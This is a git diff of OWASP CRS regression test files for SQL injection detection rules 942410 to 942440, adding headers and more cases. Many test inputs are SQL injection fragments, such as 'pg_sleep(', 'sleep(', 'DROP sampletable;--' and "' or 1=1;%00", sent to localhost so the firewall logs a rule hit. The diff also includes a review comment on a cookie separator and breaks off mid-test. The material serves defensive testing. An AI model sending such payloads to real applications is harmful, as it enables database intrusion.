data: "pay=minute+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-67 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=month%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-68 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "name_const(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-69 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "now(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-70 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "nOW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-71 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ord(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-72 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "password?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-73 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "password/?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-74 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Password>$(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-75 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pg_sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-76 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pi(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-77 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS 
test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "PI(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-78 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pow(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-79 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "POW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-80 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "quarter. 
(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-81 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "rand(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-82 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Rand (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-83 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RAND(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-84 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "replace(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-85 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "REPLACE(" + 
version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-86 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "round (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-87 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "round(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-88 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "rtrim(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-89 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RTRIM(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-90 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sin (" + 
version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-91 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SIN(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-92 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-93 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SLEEP (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-94 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=strcmp(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-95 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: 
"pay=substr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-96 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SUBSTR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-97 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=substring(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-98 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SUBSTRING(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-99 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sysdate(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-100 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + 
uri: "/" + data: "time (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-101 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=time%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-102 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=trim%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-103 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=Uncompress+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-104 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=unhex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-105 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
method: POST + port: 80 + uri: "/" + data: "pay=uNhEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-106 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=updatexml%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-107 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UpdateXML%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-108 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UPPER%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-109 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-110 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user%2F%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-111 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-112 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=values+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-113 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=VALUES%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-114 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=version%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-115 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=version%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-116 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xmltype%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-117 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=XMLType%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-118 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=year%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml index b9ea45d053..22f57a312a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml 
@@ -1,24 +1,24 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942420.yaml - tests: - - - test_title: 942420-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942420.yaml +tests: + - test_title: 942420-1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" - method: POST - port: 80 - uri: "/" - version: HTTP/1.0 - output: - log_contains: id "942420" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942420" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml index 8221e11742..75ed809f7e 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml 
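Review bot: The `Cookie` header `ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var` in 942420-1 joins the two pairs with `&`, but HTTP separates cookies with `; `, so the request carries a single cookie named `ar` whose value includes the literal `&foo=var`; the `&` and `=` are presumably counted as special characters as well. The test still passes (nine `~` already exceed the threshold of 8 named in `desc`), but it does not exercise the two-cookie layout it appears to intend. If two cookies were meant, `Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e; foo=var"` says so; otherwise a short `desc` note that the trailing separators are deliberate padding would stop a future reader from "fixing" it. This predates the commit, which only reindents the file and adds the `User-Agent`/`Accept` headers.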
@@ -1,24 +1,24 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942421.yaml - tests: - - - test_title: 942421-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942421.yaml +tests: + - test_title: 942421-1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "cookie=@@@@@@@@@@@@@" - method: GET - port: 80 - uri: "/" - version: HTTP/1.0 - output: - log_contains: id "942421" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "cookie=@@@@@@@@@@@@@" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942421" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml index 13069c5c84..db33417af8 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml 
@@ -1,23 +1,23 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942430.yaml - tests: - - - test_title: 942430-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942430.yaml +tests: + - test_title: 942430-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=(((((())))))&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942430" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=(((((())))))&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942430" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml index 08cee4bf17..02e2cd0c55 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml 
@@ -1,23 +1,23 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942431.yaml - tests: - - - test_title: 942431-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942431.yaml +tests: + - test_title: 942431-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=-------------------&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942431" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=-------------------&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942431" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml index f1544f9414..7ae6545a57 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml 
@@ -1,23 +1,23 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942432.yaml - tests: - - - test_title: 942432-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942432.yaml +tests: + - test_title: 942432-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=;;dd foo bar" - version: HTTP/1.0 - output: - log_contains: id "942432" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=;;dd foo bar" + version: HTTP/1.0 + output: + log_contains: id "942432" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml index 021d2dfb6d..d76c2bf5d0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml 
@@ -1,23 +1,339 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942440.yaml - tests: - - - test_title: 942440-1 - desc: "SQL Comment Sequence" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=DROP%20sampletable%3b--" - version: HTTP/1.0 - output: - log_contains: id "942440" +meta: + author: "Christian S.J. Peron, Max Leske" + description: None + enabled: true + name: 942440.yaml +tests: + - test_title: 942440-1 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/post?var=DROP%20sampletable%3b--" + version: HTTP/1.0 + output: + log_contains: id "942440" + - test_title: 942440-2 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1;%00" + output: + log_contains: id "942440" + - test_title: 942440-3 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 